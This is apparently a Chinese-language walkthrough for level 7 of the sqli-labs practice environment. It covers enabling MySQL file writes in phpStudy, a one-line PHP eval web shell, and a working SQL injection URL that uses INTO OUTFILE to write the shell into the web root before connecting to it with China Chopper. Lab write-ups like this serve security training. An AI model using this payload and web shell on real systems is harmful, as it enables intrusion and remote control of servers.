less-7
前置基础知识:
1. 因为我们用的是phpstudy,所以存在一个文件读写权限问题,我们需要修改一下
首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开 C:phpstudyPHPTutorialMySQLmy.ini文件,在其中加上一句:secure_file_priv=“/”。
之后重启PHP study,然后发现已经发现发生了改变,说明修改成功,就可以进行读写了。
第二个知识就是一句话木马
一句话木马有多个版本的,asp php的
这里我们只用到php版本的一句话木马:
<?php @eval($_POST[“crow”]);?> 其中crow是密码
一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html
以及第三个知识,用到的两个函数:load_file() 读取本地文件 into outfile 写文件 可以百度函数用法,提示路径需要用双斜线
我们看到提示使用函数outfile,并且可以确定存在注入漏洞
之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件
http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\phpstudy\PHPTutorial\WWW\sqli-labs\Less-7\test.php" --+
这里注意一句话木马里面的引号里面的就是密码,我们用中国菜刀进行连接:
我们可以看到i,已经成功连接,可以进行文件管理
其实,用中国菜刀比较简单,我们当然也可以把注入的内容回显的数据用outfile输出到文件中,步骤和前几关就类似了。